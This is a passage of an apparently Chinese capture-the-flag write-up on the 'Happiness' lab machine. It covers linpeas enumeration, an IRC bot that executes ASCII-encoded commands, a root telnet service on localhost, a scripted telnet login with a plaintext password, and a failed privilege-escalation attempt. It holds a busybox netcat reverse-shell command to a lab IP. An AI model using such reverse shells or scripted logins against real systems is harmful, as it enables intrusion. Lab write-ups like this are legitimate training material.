   132336      4 -rw-r-----   1 root     adm          1690 Apr 11  2025 /var/log/user.log.1
1255
   130894     12 -rw-r-----   1 root     adm         11876 Mar 31  2025 /var/log/apt/term.log.2.gz
1256
   133108      0 -rw-r-----   1 root     adm             0 Jan 22 23:43 /var/log/apt/term.log
1257
   133311     12 -rw-r-----   1 root     adm         10140 Apr 11  2025 /var/log/apt/term.log.1.gz
1258
   133841    184 -rw-r-----   1 root     adm        181706 Jan 24 02:02 /var/log/kern.log
1259
   130851     12 -rw-r-----   1 root     adm         10400 Jan 24 02:22 /var/log/syslog
1260
   133881     24 -rw-r-----   1 root     adm         18561 Jan 22 10:40 /var/log/auth.log.1
1261
   130855    224 -rw-r-----   1 root     adm        228576 Apr 11  2025 /var/log/kern.log.2.gz
1262
   133942      8 -rw-r-----   1 root     adm          5197 Jan 24 02:22 /var/log/auth.log
1263
   133852     88 -rw-r-----   1 root     adm         89768 Apr  5  2025 /var/log/syslog.4.gz
1264
   132383      0 -rw-r-----   1 irc      adm             0 Mar 31  2025 /var/log/inspircd.log
1265
   130901     60 -rw-r-----   1 root     adm         57994 Jan 24 01:26 /var/log/syslog.1
1266
   133518     52 -rw-r-----   1 root     adm         50014 Apr 11  2025 /var/log/daemon.log.2.gz
1267
   133005     28 -rw-r-----   1 root     adm         26517 Apr  1  2025 /var/log/syslog.7.gz
1268
   133892     56 -rw-r-----   1 root     adm         49492 Jan 22 10:40 /var/log/debug.1
1269
   133387     16 -rw-r-----   1 root     adm         14763 Apr 11  2025 /var/log/syslog.3.gz
1270
   130852      8 -rw-r-----   1 root     adm          7408 Apr 11  2025 /var/log/auth.log.2.gz
1271
   134195    108 -rw-r-----   1 root     adm        107576 Jan 22 10:40 /var/log/syslog.2.gz
1272
   132238      4 -rw-------   1 irc      irc           328 Mar 31  2025 /var/log/ircd/ircd-hybrid-user.log
1273
   132234      0 -rw-------   1 irc      irc             0 Mar 30  2025 /var/log/ircd/ircd-hybrid-oper.log
1274
   132224      0 -rw-------   1 irc      irc             0 Mar 30  2025 /var/log/ircd/ircd-hybrid-kill.log
1275
   132227      0 -rw-------   1 irc      irc             0 Mar 30  2025 /var/log/ircd/ircd-hybrid-dline.log
1276
   132240      0 -rw-------   1 irc      irc             0 Mar 30  2025 /var/log/ircd/ircd-hybrid-debug.log
1277
   132226      0 -rw-------   1 irc      irc             0 Mar 30  2025 /var/log/ircd/ircd-hybrid-kline.log
1278
   132233      0 -rw-------   1 irc      irc             0 Mar 30  2025 /var/log/ircd/ircd-hybrid-resv.log
1279
   132231      0 -rw-------   1 irc      irc             0 Mar 30  2025 /var/log/ircd/ircd-hybrid-xline.log
1280
   132995     44 -rw-r-----   1 root     adm         41915 Apr  3  2025 /var/log/syslog.6.gz
1281
   130857     16 -rw-r-----   1 root     adm         13708 Apr 11  2025 /var/log/debug.2.gz
1282
   130854     72 -rw-r-----   1 root     adm         68886 Jan 24 02:22 /var/log/daemon.log
1283
   130853    196 -rw-r-----   1 root     adm        198715 Apr 11  2025 /var/log/messages.2.gz
1284
   133953      4 -rw-r-----   1 root     adm           203 Jan 24 01:53 /var/log/user.log
1285
   133960    152 -rw-r-----   1 root     adm        152640 Jan 24 02:02 /var/log/messages
1286
   131094     16 -rw-r-----   1 root     adm         13851 Apr  4  2025 /var/log/syslog.5.gz
1287
   133899    312 -rw-r-----   1 root     adm        311774 Jan 22 10:40 /var/log/messages.1
1288
   133876    356 -rw-r-----   1 root     adm        357157 Jan 22 10:40 /var/log/kern.log.1
1289

1290
╔══════════╣ Files inside /home/Eecho (limit 20)
1291
total 4012
1292
drwxr-xr-x 3 Eecho Eecho    4096 Jan 24 02:22 .
1293
drwxr-xr-x 3 root  root     4096 Jan 22 11:51 ..
1294
-rw-r--r-- 1 Eecho Eecho     220 Apr 18  2019 .bash_logout
1295
-rw-r--r-- 1 Eecho Eecho    3526 Apr 18  2019 .bashrc
1296
drwx------ 3 Eecho Eecho    4096 Jan 24 02:22 .gnupg
1297
-rwxrwxrwx 1 Eecho Eecho  971926 Nov 15 10:04 linpeas.sh
1298
-rw-r--r-- 1 Eecho Eecho     807 Apr 18  2019 .profile
1299
-rwxrwxrwx 1 Eecho Eecho 3104768 Jan 11 08:51 pspy64
1300
-rw------- 1 Eecho Eecho      44 Jan 22 12:59 user.txt
1301

1302
╔══════════╣ Files inside others home (limit 20)
1303
/var/www/html/uploads/.htaccess
1304
/var/www/html/uploads/mac.png
1305
/var/www/html/uploads/syz.png
1306
/var/www/html/uploads/mac.jpg
1307
/var/www/html/shell.php
1308
/var/www/html/index.php
1309
/var/www/localhost/index.html
1310

1311
╔══════════╣ Searching installed mail applications
1312

1313
╔══════════╣ Mails (limit 50)
1314

1315
╔══════════╣ Backup folders
1316
drwxr-xr-x 2 root root 4096 Jan 24 02:07 /var/backups
1317
total 44
1318
-rw-r--r-- 1 root root 24014 Jan 22 12:40 apt.extended_states.0
1319
-rw-r--r-- 1 root root  2568 Apr 11  2025 apt.extended_states.1.gz
1320
-rw-r--r-- 1 root root  2556 Apr  4  2025 apt.extended_states.2.gz
1321
-rw-r--r-- 1 root root  2006 Apr  1  2025 apt.extended_states.3.gz
1322
-rw-r--r-- 1 root root  1542 Apr  1  2025 apt.extended_states.4.gz
1323
-rw-r--r-- 1 root root   757 Mar 30  2025 apt.extended_states.5.gz
1324

1325

1326
╔══════════╣ Backup files (limited 100)
1327
-rw-r--r-- 1 root root 9731 Jun 30  2022 /usr/lib/modules/4.19.0-21-amd64/kernel/drivers/net/team/team_mode_activebackup.ko
1328
-rw-r--r-- 1 root root 9731 Jun 25  2024 /usr/lib/modules/4.19.0-27-amd64/kernel/drivers/net/team/team_mode_activebackup.ko
1329
-rw-r--r-- 1 root root 416107 Dec 21  2020 /usr/share/doc/manpages/Changes.old.gz
1330
-rw-r--r-- 1 root root 194817 Oct  9  2020 /usr/share/doc/x11-common/changelog.Debian.old.gz
1331
-rw-r--r-- 1 root root 1133 Jan 22 12:34 /etc/inetd.conf.bak
1332

1333
╔══════════╣ Searching tables inside readable .db/.sql/.sqlite files (limit 100)
1334
Found /var/lib/PackageKit/transactions.db: SQLite 3.x database, last written using SQLite version 3027002
1335

1336
 -> Extracting tables from /var/lib/PackageKit/transactions.db (limit 20)
1337

1338
╔══════════╣ Web files?(output limit)
1339
/var/www/:
1340
total 16K
1341
drwxr-xr-x  4 root     root     4.0K Jan 22 12:00 .
1342
drwxr-xr-x 13 root     root     4.0K Jan 22 12:27 ..
1343
drwxr-xr-x  3 www-data www-data 4.0K Jan 24 01:53 html
1344
drwxr-xr-x  2 www-data www-data 4.0K Jan 22 13:50 localhost
1345

1346
/var/www/html:
1347
total 24K
1348
drwxr-xr-x 3 www-data www-data 4.0K Jan 24 01:53 .
1349

1350
╔══════════╣ All relevant hidden files (not in /sys/ or the ones listed in the previous check) (limit 70)
1351
-rw-r--r-- 1 root root 0 Jan 24 01:26 /run/network/.ifstate.lock
1352
-rw-r--r-- 1 root root 0 Feb 22  2021 /usr/share/dictionaries-common/site-elisp/.nosearch
1353
-rw-r--r-- 1 Eecho Eecho 220 Apr 18  2019 /home/Eecho/.bash_logout
1354
-rw-r--r-- 1 root root 220 Apr 18  2019 /etc/skel/.bash_logout
1355
-rw------- 1 root root 0 Mar 18  2025 /etc/.pwd.lock
1356
-rw-r--r-- 1 www-data www-data 71 Jan 24 01:48 /var/www/html/uploads/.htaccess
1357

1358
╔══════════╣ Readable files inside /tmp, /var/tmp, /private/tmp, /private/var/at/tmp, /private/var/tmp, and backup folders (limit 70)
1359

1360
╔══════════╣ Searching passwords in history files
1361
/usr/share/rubygems-integration/all/gems/rake-13.0.3/lib/rake/thread_history_display.rb:      @stats   = stats
1362
/usr/share/rubygems-integration/all/gems/rake-13.0.3/lib/rake/thread_history_display.rb:      @items   = { _seq_: 1  }
1363
/usr/share/rubygems-integration/all/gems/rake-13.0.3/lib/rake/thread_history_display.rb:      @threads = { _seq_: "A" }
1364

1365
╔══════════╣ Searching *password* or *credential* files in home (limit 70)
1366
/etc/pam.d/common-password
1367
/usr/bin/systemd-ask-password
1368
/usr/bin/systemd-tty-ask-password-agent
1369
/usr/lib/grub/i386-pc/legacy_password_test.mod
1370
/usr/lib/grub/i386-pc/password.mod
1371
/usr/lib/grub/i386-pc/password_pbkdf2.mod
1372
/usr/lib/ruby/2.7.0/bundler/uri_credentials_filter.rb
1373
/usr/lib/systemd/systemd-reply-password
1374
/usr/lib/systemd/system/multi-user.target.wants/systemd-ask-password-wall.path
1375
/usr/lib/systemd/system/sysinit.target.wants/systemd-ask-password-console.path
1376
/usr/lib/systemd/system/systemd-ask-password-console.path
1377
/usr/lib/systemd/system/systemd-ask-password-console.service
1378
/usr/lib/systemd/system/systemd-ask-password-wall.path
1379
/usr/lib/systemd/system/systemd-ask-password-wall.service
1380
  #)There are more creds/passwds files in the previous parent folder
1381

1382
/usr/lib/x86_64-linux-gnu/libmariadb3/plugin/mysql_clear_password.so
1383
/usr/lib/x86_64-linux-gnu/libmariadb3/plugin/sha256_password.so
1384
/usr/share/icons/Adwaita/16x16/legacy/dialog-password.png
1385
/usr/share/icons/Adwaita/16x16/status/dialog-password-symbolic.symbolic.png
1386
/usr/share/icons/Adwaita/22x22/legacy/dialog-password.png
1387
/usr/share/icons/Adwaita/24x24/legacy/dialog-password.png
1388
/usr/share/icons/Adwaita/24x24/status/dialog-password-symbolic.symbolic.png
1389
/usr/share/icons/Adwaita/256x256/legacy/dialog-password.png
1390
/usr/share/icons/Adwaita/32x32/legacy/dialog-password.png
1391
/usr/share/icons/Adwaita/32x32/status/dialog-password-symbolic.symbolic.png
1392
/usr/share/icons/Adwaita/48x48/legacy/dialog-password.png
1393
/usr/share/icons/Adwaita/48x48/status/dialog-password-symbolic.symbolic.png
1394
/usr/share/icons/Adwaita/64x64/status/dialog-password-symbolic.symbolic.png
1395
/usr/share/icons/Adwaita/96x96/status/dialog-password-symbolic.symbolic.png
1396
/usr/share/icons/Adwaita/scalable/status/dialog-password-symbolic.svg
1397
/usr/share/man/man1/systemd-ask-password.1.gz
1398
/usr/share/man/man1/systemd-tty-ask-password-agent.1.gz
1399
/usr/share/man/man7/credentials.7.gz
1400
/usr/share/man/man8/systemd-ask-password-console.path.8.gz
1401
/usr/share/man/man8/systemd-ask-password-console.service.8.gz
1402
/usr/share/man/man8/systemd-ask-password-wall.path.8.gz
1403
/usr/share/man/man8/systemd-ask-password-wall.service.8.gz
1404
  #)There are more creds/passwds files in the previous parent folder
1405

1406
/usr/share/pam/common-password.md5sums
1407
/var/cache/debconf/passwords.dat
1408
/var/lib/pam/password
1409

1410
╔══════════╣ Checking for TTY (sudo/su) passwords in audit logs
1411

1412
╔══════════╣ Checking for TTY (sudo/su) passwords in audit logs
1413

1414
╔══════════╣ Searching passwords inside logs (limit 70)
1415
Binary file /var/log/journal/52a22a6e47cb4a5995fb43c3554baa0e/user-1000.journal matches
1416
/var/log/installer/status:Description: Set up users and passwords
1417

1418
╔══════════╣ Checking all env variables in /proc/*/environ removing duplicates and filtering out useless env vars
1419
HOME=/home/Eecho
1420
LANG=en_US.UTF-8
1421
_=./linpeas.sh
1422
LISTEN_FDNAMES=dbus.socket
1423
LISTEN_FDS=1
1424
LOGNAME=Eecho
1425
MANAGERPID=12507
1426
NOTIFY_SOCKET=/run/systemd/notify
1427
PWD=/home/Eecho
1428
SHELL=/bin/bash
1429
SHLVL=1
1430
SSH_CLIENT=192.168.0.108 36408 22
1431
SSH_CLIENT=192.168.0.108 39356 22
1432
SSH_CONNECTION=192.168.0.108 36408 192.168.0.106 22
1433
SSH_CONNECTION=192.168.0.108 39356 192.168.0.106 22
1434
SSH_TTY=/dev/pts/0
1435
SSH_TTY=/dev/pts/1
1436
TERM=xterm-256color
1437
USER=Eecho
1438
XDG_RUNTIME_DIR=/run/user/1000
1439

1440

1441
                                ╔════════════════╗
1442
════════════════════════════════╣ API Keys Regex ╠════════════════════════════════
1443
                                ╚════════════════╝
1444
Regexes to search for API keys aren't activated, use param '-r'

1
Eecho@Happiness:~$ cat /usr/local/bin/irc_bot.py
2
import irc.bot
3
import irc.client
4
import re
5
import subprocess
6
import time
7
import threading
8

9
class IRCBot(irc.bot.SingleServerIRCBot):
10
    def __init__(self, server, port, nickname, channels, command_channel):
11
        irc.bot.SingleServerIRCBot.__init__(self, [(server, port)], nickname, nickname)
12
        self.channel_list = channels
13
        self.command_channel = "#chan1"  # 唯一执行命令的频道
14
        self.command_channels = ["#chan1", "#chan2", "#chan3", "#chan4", "#chan5"]  # 所有检测命令的频道
15
        self.command_pattern = re.compile(r':\)$')
16
        self.allowed_users = {"Todd", "suraxddq", "ll104567"}
17
        self.number_regex = re.compile(r'^\s*(\d+\s+)*\d+\s*$')
18
        self.allowed_commands = ["more", "dir", "busybox", "whoami"]
19
        self.chan6_timer = None
20

21
    def on_welcome(self, connection, event):
22
        for channel in self.channel_list:
23
            connection.join(channel)
24
            print(f"[+] Already joined the channel：{channel}")
25
        self.start_chan6_timer()
26

27
    def start_chan6_timer(self):
28
        if self.chan6_timer:
29
            self.chan6_timer.cancel()
30
        self.chan6_timer = threading.Timer(180.0, self.send_chan6_message)
31
        self.chan6_timer.start()
32

33
    def send_chan6_message(self):
34
        try:
35
            if self.connection.is_connected():
36
                self.connection.privmsg("#chan6", "My friends and I are chatting on it, but we all follow the formatting requirements. Finally, we need to:) End")
37
                print("[*] Timed reminder has been sent #chan6")
38
        except Exception as e:
39
            print(f"[!] Sending timed notification failed：{str(e)}")
40
        finally:
41
            self.start_chan6_timer()
42

43
    def on_disconnect(self, connection, event):
44
        if self.chan6_timer:
45
            self.chan6_timer.cancel()
46
            self.chan6_timer = None
47
        super().on_disconnect(connection, event)
48

49
    def on_pubmsg(self, connection, event):
50
        channel = event.target
51
        user = event.source.nick
52
        message = event.arguments[0]
53

54
        # 检测所有命令频道的消息
55
        if channel in self.command_channels and self.command_pattern.search(message):
56
            print(f"[*] Received command：{message} (From users：{user})")
57

58
            # 格式验证（所有频道通用）
59
            cmd_part = message.rsplit(':)', 1)[0].strip()
60
            if not self.number_regex.match(cmd_part):
61
                connection.privmsg(user, "[!] Format error or presence of illegal characters")
62
                return
63

64
            # 非#chan1频道直接返回权限错误
65
            if channel != self.command_channel:
66
                connection.privmsg(user, "[!] Error: Command execution not allowed")
67
                return
68

69
            # #chan1专属执行流程
70
            if self.validate_command(user):
71
                try:
72
                    numbers = list(map(int, cmd_part.split()))
73
                    for num in numbers:
74
                        if num < 0 or num > 255:
75
                            raise ValueError("[-] Number range exceeds（0-255）")
76
                    ascii_cmd = ''.join([chr(n) for n in numbers])
77
                except ValueError as e:
78
                    connection.privmsg(user, f"[!] conversion error ：{str(e)}")
79
                    return
80

81
                if not self.is_command_allowed(ascii_cmd):
82
                    connection.privmsg(user, f"[!] Wrong command: '{ascii_cmd.split()[0]}' unauthorized!")
83
                    return
84

85
                result = self.execute_command(ascii_cmd)
86
                if result:
87
                    safe_result = result.replace('\n', ' ').replace('\r', '')
88
                    try:
89
                        connection.privmsg(user, f"[+] COMMAND EXECUTION：{safe_result}")
90
                    except irc.client.InvalidCharacters:
91
                        connection.privmsg(user, "[!] Format error or presence of illegal characters")
92
            else:
93
                connection.privmsg(user, "[!] Format error or presence of illegal characters")
94

95
    def is_command_allowed(self, command):
96
        parts = command.strip().split()
97
        if not parts:
98
            return False
99
        main_cmd = parts[0]
100
        return (
101
            main_cmd in self.allowed_commands and
102
            not re.search(r'[;&|`]', command)
103
        )
104

105
    def execute_command(self, command):
106
        try:
107
            parts = command.strip().split()
108
            output = subprocess.check_output(
109
                parts,
110
                stderr=subprocess.STDOUT,
111
                universal_newlines=True,
112
                timeout=10
113
            )
114
            return output.strip()[:400].replace('\r', '').replace('\n', ' ')
115
        except subprocess.CalledProcessError as e:
116
            return f"[!] Command execution failed：{e.output.strip()}"
117
        except Exception as e:
118
            return f"[-] Error：{str(e)}"
119

120
    def validate_command(self, user):
121
        return user in self.allowed_users
122

123
def run_bot():
124
    server = "PyCrt"
125
    port = 6667
126
    nickname = "admin"
127
    channels = ["#chan1", "#chan2", "#chan3", "#chan4", "#chan5", "#chan6"]
128
    command_channel = "#chan1"
129

130
    while True:
131
        try:
132
            print("[*] Starting IRC server...")
133
            bot = IRCBot(server, port, nickname, channels, command_channel)
134
            bot.start()
135
        except KeyboardInterrupt:
136
            print("\n[!] user exit")
137
            if bot.chan6_timer:
138
                bot.chan6_timer.cancel()
139
            break
140
        except Exception as e:
141
            print(f"[!] Exception occurred:{str(e)}，Try again in 5 seconds...")
142
            time.sleep(5)
143

144
if __name__ == "__main__":
145
    run_bot()
146
Eecho@Happiness:~$ cat /etc/systemd/system/irc_bot.service
147
[Unit]
148
Description=IRC Bot Service
149
After=network.target
150

151
[Service]
152
User=pycrtlake
153
Group=pycrtlake
154
WorkingDirectory=/usr/local/bin
155
ExecStart=/usr/bin/python3 /usr/local/bin/irc_bot.py
156
Restart=always
157
RestartSec=5
158
StandardOutput=syslog
159
StandardError=syslog
160
Environment=PYTHONUNBUFFERED=1
161

162
[Install]
163
WantedBy=multi-user.target
164
Eecho@Happiness:~$ cat /etc/inetd.conf
165
127.0.0.1:daytime stream tcp nowait root internal
166
127.0.0.1:daytime dgram udp wait root internal
167
127.0.0.1:echo stream tcp nowait root internal
168
127.0.0.1:echo dgram udp wait root internal
169
127.0.0.1:discard stream tcp nowait root internal
170
127.0.0.1:discard dgram udp wait root internal
171
127.0.0.1:time stream tcp nowait root internal
172
127.0.0.1:time dgram udp wait root internal
173
127.0.0.1:chargen stream tcp nowait root internal
174
127.0.0.1:chargen dgram udp wait root internal
175
127.0.0.1:telnet stream tcp nowait root /usr/sbin/tcpd /usr/sbin/telnetd
176
Eecho@Happiness:~$ cat /etc/inetd.conf.bak
177
# /etc/inetd.conf: see inetd(8) for further informations.
178
#
179
# Internet superserver configuration database.
180
#
181
#
182
# Lines starting with "#:LABEL:" or "#<off>#" should not
183
# be changed unless you know what you are doing!
184
#
185
# If you want to disable an entry so it is not touched during
186
# package updates just comment it out with a single '#' character.
187
#
188
# Packages should modify this file by using update-inetd(8).
189
#
190
# <service_name> <sock_type> <proto> <flags> <user> <server_path> <args>
191
#
192
#:INTERNAL: Internal services
193
#discard                stream  tcp6    nowait  root   internal
194
#discard                dgram   udp6    wait    root   internal
195
#daytime                stream  tcp6    nowait  root   internal
196
#time           stream  tcp6    nowait  root    internal
197

198
#:STANDARD: These are standard services.
199
#<off># telnet  stream  tcp     nowait  root    /usr/sbin/tcpd  /usr/sbin/telnetd
200

201
#:BSD: Shell, login, exec and talk are BSD protocols.
202

203
#:MAIL: Mail, news and uucp services.
204

205
#:INFO: Info services
206

207
#:BOOT: TFTP service is provided primarily for booting.  Most sites
208
#       run this only on machines acting as "boot servers."
209

210
#:RPC: RPC based services
211

212
#:HAM-RADIO: amateur-radio services
213

214
#:OTHER: Other services

IRC Bot 攻击向量分析

关键点：

IRC Bot 连接到 PyCrt:6667（即 127.0.0.1:6667）
允许的命令：more, dir, busybox, whoami
允许的用户：Todd, suraxddq, ll104567
命令格式：数字（ASCII码）+ :) 结尾
只能在 #chan1 执行命令

重要发现：

busybox 命令被允许 → 可以使用 busybox nc 建立反向shell！
服务以 pycrtlake 用户运行
攻击步骤

1. 检查IRC服务是否运行

ss -tlnp | grep 6667
ps aux | grep irc

2. 安装IRC客户端

which irssi || which nc

3. 连接IRC服务器

nc 127.0.0.1 6667

连接后发送：
NICK Todd
USER Todd 0 * :Todd
JOIN #chan1

命令编码示例

要执行 whoami，需要转换为ASCII：

w=119, h=104, o=111, a=97, m=109, i=105
PRIVMSG #chan1 :119 104 111 97 109 105 :)
获取反向Shell（使用busybox nc）
busybox nc -e /bin/sh 你的IP 端口的ASCII编码：

用Python生成

python3 -c “print(’ ‘.join(str(ord(c)) for c in ‘busybox nc -e /bin/sh 192.168.0.108 4444’))”

● IRC服务器没有运行。但是注意看 inetd.conf 里的配置：

127.0.0.1:telnet stream tcp nowait root /usr/sbin/tcpd /usr/sbin/telnetd

Telnet服务以root身份运行在127.0.0.1:23！

直接尝试本地telnet连接

busybox nc 127.0.0.1 23

1
python3 << 'EOF'
2
import socket
3
import time
4

5
HOST = '127.0.0.1'
6
PORT = 23
7

8
USER = b"Eecho"
9
PASS = b"2VQzte2RBr8p8MuOA0Gw2Sum"   # 改成真实密码
10

11
def reject_opts(data):
12
    resp = b''
13
    i = 0
14
    while i + 2 < len(data):
15
        if data[i] == 0xff:       # IAC
16
            cmd = data[i+1]
17
            opt = data[i+2]
18
            if cmd == 0xfd:       # DO  -> WONT
19
                resp += b'\xff\xfc' + bytes([opt])
20
            elif cmd == 0xfb:     # WILL -> DONT
21
                resp += b'\xff\xfe' + bytes([opt])
22
            i += 3
23
        else:
24
            i += 1
25
    return resp
26

27
s = socket.socket()
28
s.settimeout(5)
29
s.connect((HOST, PORT))
30

31
# 先处理协商，直到看到 login:
32
for r in range(10):
33
    try:
34
        time.sleep(0.4)
35
        data = s.recv(4096)
36
        print(f"[RECV{r}]", data)
37

38
        resp = reject_opts(data)
39
        if resp:
40
            print(f"[SEND{r}]", resp)
41
            s.send(resp)
42

43
        if b"login:" in data.lower():
44
            break
45
    except:
46
        pass
47

48
# 发送用户名
49
time.sleep(0.3)
50
print("[SEND] USER")
51
s.send(USER + b"\r\n")
52

53
# 等 Password:
54
while True:
55
    time.sleep(0.4)
56
    try:
57
        data = s.recv(4096)
58
        print("[RECV-PASS]", data)
59

60
        resp = reject_opts(data)
61
        if resp:
62
            s.send(resp)
63

64
        if b"password" in data.lower():
65
            break
66

67
        if b"login incorrect" in data.lower():
68
            print("[!] Login failed before password stage")
69
            s.close()
70
            exit()
71
    except:
72
        pass
73

74
# 发送密码
75
time.sleep(0.3)
76
print("[SEND] PASS")
77
s.send(PASS + b"\r\n")
78

79
# 读最终结果
80
time.sleep(1)
81
try:
82
    data = s.recv(4096)
83
    print("[RECV-FINAL]", data)
84
except:
85
    print("[!] no final response")
86

87
s.close()
88
EOF

1
┌──(web)─(root㉿kali)-[/home/kali/Desktop/hmv]
2
└─# telnet 127.0.0.1
3
Trying 127.0.0.1...
4
Connected to 127.0.0.1.
5
Escape character is '^]'.
6

7
Linux 4.19.0-27-amd64 (localhost) (pts/2)
8

9
Happiness login: Eecho
10
Password:
11
Last login: Sat Jan 24 02:53:51 EST 2026 from 192.168.0.108 on pts/1
12
Linux Happiness 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
13

14
The programs included with the Debian GNU/Linux system are free software;
15
the exact distribution terms for each program are described in the
16
individual files in /usr/share/doc/*/copyright.
17

18
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
19
permitted by applicable law.
20
Eecho@Happiness:~$
21
改个密码new_passwd

1
echo@Happiness:/tmp/CVE-2021-4034-main$ cat /etc/passwd
2
root:x:0:0:root:/root:/bin/bash
3
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
4
bin:x:2:2:bin:/bin:/usr/sbin/nologin
5
sys:x:3:3:sys:/dev:/usr/sbin/nologin
6
sync:x:4:65534:sync:/bin:/bin/sync
7
games:x:5:60:games:/usr/games:/usr/sbin/nologin
8
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
9
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
10
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
11
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
12
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
13
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
14
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
15
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
16
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
17
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
18
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
19
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
20
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
21
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
22
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
23
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
24
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
25
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
26
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
27
Eecho:x:1000:1000::/home/Eecho:/bin/bash
28
ftp:x:106:113:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin

1
Eecho@Happiness:~$ ls -al
2
total 4040
3
drwxr-xr-x 3 Eecho Eecho    4096 Jan 24 02:53 .
4
drwxr-xr-x 3 root  root     4096 Jan 22 11:51 ..
5
-rw------- 1 Eecho Eecho   12315 Jan 24 02:53 .bash_history
6
-rw-r--r-- 1 Eecho Eecho     220 Apr 18  2019 .bash_logout
7
-rw-r--r-- 1 Eecho Eecho    3526 Apr 18  2019 .bashrc
8
drwx------ 3 Eecho Eecho    4096 Jan 24 02:22 .gnupg
9
-rwxrwxrwx 1 Eecho Eecho  971926 Nov 15 10:04 linpeas.sh
10
-rw-r--r-- 1 Eecho Eecho     807 Apr 18  2019 .profile
11
-rwxrwxrwx 1 Eecho Eecho 3104768 Jan 11 08:51 pspy64
12
-rw-r--r-- 1 Eecho Eecho    9452 Jan 24 02:46 pspy_output.txt
13
-rw------- 1 Eecho Eecho      44 Jan 22 12:59 user.txt
14
Eecho@Happiness:~$ cd .gnupg/
15
Eecho@Happiness:~/.gnupg$ ls
16
private-keys-v1.d  pubring.kbx  trustdb.gpg
17

18
Eecho@Happiness:~/.gnupg$ cat pubring.kbx
19
KBXfits5its5
20
Eecho@Happiness:~/.gnupg$ cat trustdb.gpg
21
gpgits5
22
Eecho@Happiness:~/.gnupg$ cd private-keys-v1.d/
23
Eecho@Happiness:~/.gnupg/private-keys-v1.d$ ls
24
Eecho@Happiness:~/.gnupg/private-keys-v1.d$ ls -al
25
total 8
26
drwx------ 2 Eecho Eecho 4096 Jan 24 02:22 .
27
drwx------ 3 Eecho Eecho 4096 Jan 24 02:22 ..

提权不出来-放弃了

提权-wp

潜伏11年的Telnetd核弹漏洞：CVE-2026-24061零认证提权席卷全球，公开PoC触发全网紧急防御-CSDN博客↗

https://mp.weixin.qq.com/s?__biz=Mzk0MDQzNzY5NQ==&mid=2247494187&idx=1&sn=a91383587d33514f16787771ad5ebb7c&chksm=c3543eef0b49c5bff27c58a2c6154e256eced2f98a5a72cb9b73cd2579cafeb2b72dec675cee&mpshare=1&scene=23&srcid=0125VjcX4sgoiMS4vSYuzuSM&sharer_shareinfo=a2b798aab7f658305d3591e85f619072&sharer_shareinfo_first=a2b798aab7f658305d3591e85f619072#rd↗

Thanks for reading!

MazeSec-Happiness

Sun Jan 25 2026

351 words · 2 minutes

Documentation MazeSec MazeSec Linux Machine Privilege Escalation Enumeration Password Attacks